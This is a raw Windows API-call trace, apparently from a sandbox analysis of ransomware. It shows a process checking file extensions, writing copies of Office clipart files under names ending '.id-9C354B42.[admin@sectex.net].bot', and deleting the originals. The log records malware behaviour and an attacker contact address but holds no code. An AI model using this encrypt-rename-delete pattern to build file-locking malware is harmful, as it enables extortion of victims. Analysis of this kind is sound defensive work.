	[0144.916] lstrlenW (lpString=".bz2") returned 4
	[0144.916] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString=".7z") returned 3
	[0144.916] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.916] lstrlenW (lpString=".dbf") returned 4
	[0144.916] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.916] lstrlenW (lpString=".1cd") returned 4
	[0144.916] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.916] lstrlenW (lpString=".jpg") returned 4
	[0144.916] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.916] lstrlenW (lpString=".doc") returned 4
	[0144.916] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString=".docx") returned 5
	[0144.916] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.916] lstrlenW (lpString=".pdf") returned 4
	[0144.916] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.916] lstrlenW (lpString=".xls") returned 4
	[0144.916] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.916] lstrlenW (lpString=".xlsx") returned 5
	[0144.917] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.917] lstrlenW (lpString=".ppt") returned 4
	[0144.917] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.917] lstrlenW (lpString=".zip") returned 4
	[0144.917] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.917] lstrlenW (lpString=".rar") returned 4
	[0144.917] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.917] lstrlenW (lpString=".bz2") returned 4
	[0144.917] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.917] lstrlenW (lpString=".7z") returned 3
	[0144.917] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.917] lstrlenW (lpString=".dbf") returned 4
	[0144.917] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.917] lstrlenW (lpString=".1cd") returned 4
	[0144.917] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 63
	[0144.917] lstrlenW (lpString=".jpg") returned 4
	[0144.917] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.917] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.917] lstrlenW (lpString="DD01171_.WMF") returned 12
	[0144.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.918] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2052) returned 1
	[0144.918] CloseHandle (hObject=0x388) returned 1
	[0144.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 0x20
	[0144.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.918] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.919] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.919] GetLastError () returned 0x0
	[0144.919] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x804, lpOverlapped=0x0) returned 1
	[0144.937] WriteFile (in: hFile=0x31c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x810, lpOverlapped=0x0) returned 1
	[0144.938] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.938] WriteFile (in: hFile=0x31c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.938] SetEndOfFile (hFile=0x31c) returned 1
	[0144.938] CloseHandle (hObject=0x31c) returned 1
	[0144.938] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.938] SetEndOfFile (hFile=0x388) returned 1
	[0144.940] CloseHandle (hObject=0x388) returned 1
	[0144.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 1
	[0144.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.941] lstrlenW (lpString=".doc") returned 4
	[0144.941] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.941] lstrlenW (lpString=".docx") returned 5
	[0144.941] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.941] lstrlenW (lpString=".pdf") returned 4
	[0144.941] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.941] lstrlenW (lpString=".xls") returned 4
	[0144.941] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.941] lstrlenW (lpString=".xlsx") returned 5
	[0144.941] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.941] lstrlenW (lpString=".ppt") returned 4
	[0144.941] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.941] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.941] lstrlenW (lpString=".zip") returned 4
	[0144.941] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.941] lstrlenW (lpString=".rar") returned 4
	[0144.942] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString=".bz2") returned 4
	[0144.942] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString=".7z") returned 3
	[0144.942] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.942] lstrlenW (lpString=".dbf") returned 4
	[0144.942] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.942] lstrlenW (lpString=".1cd") returned 4
	[0144.942] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.942] lstrlenW (lpString=".jpg") returned 4
	[0144.942] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.942] lstrlenW (lpString=".doc") returned 4
	[0144.942] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString=".docx") returned 5
	[0144.942] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.942] lstrlenW (lpString=".pdf") returned 4
	[0144.942] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString=".xls") returned 4
	[0144.942] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.942] lstrlenW (lpString=".xlsx") returned 5
	[0144.942] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.942] lstrlenW (lpString=".ppt") returned 4
	[0144.942] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.942] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.942] lstrlenW (lpString=".zip") returned 4
	[0144.942] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.942] lstrlenW (lpString=".rar") returned 4
	[0144.943] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.943] lstrlenW (lpString=".bz2") returned 4
	[0144.943] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.943] lstrlenW (lpString=".7z") returned 3
	[0144.943] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.943] lstrlenW (lpString=".dbf") returned 4
	[0144.943] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.943] lstrlenW (lpString=".1cd") returned 4
	[0144.943] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63
	[0144.943] lstrlenW (lpString=".jpg") returned 4
	[0144.943] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.943] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.943] lstrlenW (lpString="DD01173_.WMF") returned 12
	[0144.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0144.966] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1804) returned 1
	[0144.966] CloseHandle (hObject=0x3bc) returned 1
	[0144.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf")) returned 0x20
	[0145.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.042] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.042] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.043] GetLastError () returned 0x0
	[0145.043] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x70c, lpOverlapped=0x0) returned 1
	[0145.082] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x710, lpOverlapped=0x0) returned 1
	[0145.082] ReadFile (in: hFile=0x3d4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.082] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.083] SetEndOfFile (hFile=0x3d8) returned 1
	[0145.083] CloseHandle (hObject=0x3d8) returned 1
	[0145.083] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.083] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.086] CloseHandle (hObject=0x3d4) returned 1
	[0145.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf")) returned 1
	[0145.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.098] lstrlenW (lpString=".doc") returned 4
	[0145.098] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.098] lstrlenW (lpString=".docx") returned 5
	[0145.098] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.098] lstrlenW (lpString=".pdf") returned 4
	[0145.098] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.098] lstrlenW (lpString=".xls") returned 4
	[0145.098] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.098] lstrlenW (lpString=".xlsx") returned 5
	[0145.098] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.098] lstrlenW (lpString=".ppt") returned 4
	[0145.098] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.098] lstrlenW (lpString=".zip") returned 4
	[0145.098] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.098] lstrlenW (lpString=".rar") returned 4
	[0145.098] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.098] lstrlenW (lpString=".bz2") returned 4
	[0145.098] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.098] lstrlenW (lpString=".7z") returned 3
	[0145.098] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString=".dbf") returned 4
	[0145.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString=".1cd") returned 4
	[0145.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString=".jpg") returned 4
	[0145.099] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString=".doc") returned 4
	[0145.099] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString=".docx") returned 5
	[0145.099] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.099] lstrlenW (lpString=".pdf") returned 4
	[0145.099] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString=".xls") returned 4
	[0145.099] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.099] lstrlenW (lpString=".xlsx") returned 5
	[0145.099] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.099] lstrlenW (lpString=".ppt") returned 4
	[0145.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString=".zip") returned 4
	[0145.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.099] lstrlenW (lpString=".rar") returned 4
	[0145.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString=".bz2") returned 4
	[0145.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.099] lstrlenW (lpString=".7z") returned 3
	[0145.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.099] lstrlenW (lpString=".dbf") returned 4
	[0145.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.100] lstrlenW (lpString=".1cd") returned 4
	[0145.100] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 63
	[0145.100] lstrlenW (lpString=".jpg") returned 4
	[0145.100] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.100] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.100] lstrlenW (lpString="DD01183_.WMF") returned 12
	[0145.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0145.100] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2296) returned 1
	[0145.100] CloseHandle (hObject=0x3cc) returned 1
	[0145.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 0x20
	[0145.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0145.101] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.101] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0145.101] GetLastError () returned 0x0
	[0145.101] ReadFile (in: hFile=0x3cc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8f8, lpOverlapped=0x0) returned 1
	[0145.113] WriteFile (in: hFile=0x39c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x900, lpOverlapped=0x0) returned 1
	[0145.114] ReadFile (in: hFile=0x3cc, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.114] WriteFile (in: hFile=0x39c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.114] SetEndOfFile (hFile=0x39c) returned 1
	[0145.115] CloseHandle (hObject=0x39c) returned 1
	[0145.115] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.115] SetEndOfFile (hFile=0x3cc) returned 1
	[0145.116] CloseHandle (hObject=0x3cc) returned 1
	[0145.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.117] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01183_.wmf")) returned 1
	[0145.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.117] lstrlenW (lpString=".doc") returned 4
	[0145.117] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.117] lstrlenW (lpString=".docx") returned 5
	[0145.117] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.117] lstrlenW (lpString=".pdf") returned 4
	[0145.117] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString=".xls") returned 4
	[0145.118] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.118] lstrlenW (lpString=".xlsx") returned 5
	[0145.118] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.118] lstrlenW (lpString=".ppt") returned 4
	[0145.118] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01183_.WMF") returned 63
	[0145.118] lstrlenW (lpString=".zip") returned 4
	[0145.118] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.118] lstrlenW (lpString=".rar") returned 4
	[0145.118] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString=".bz2") returned 4
	[0145.118] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.118] lstrlenW (lpString=".7z") returned 3
	[0145.118] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
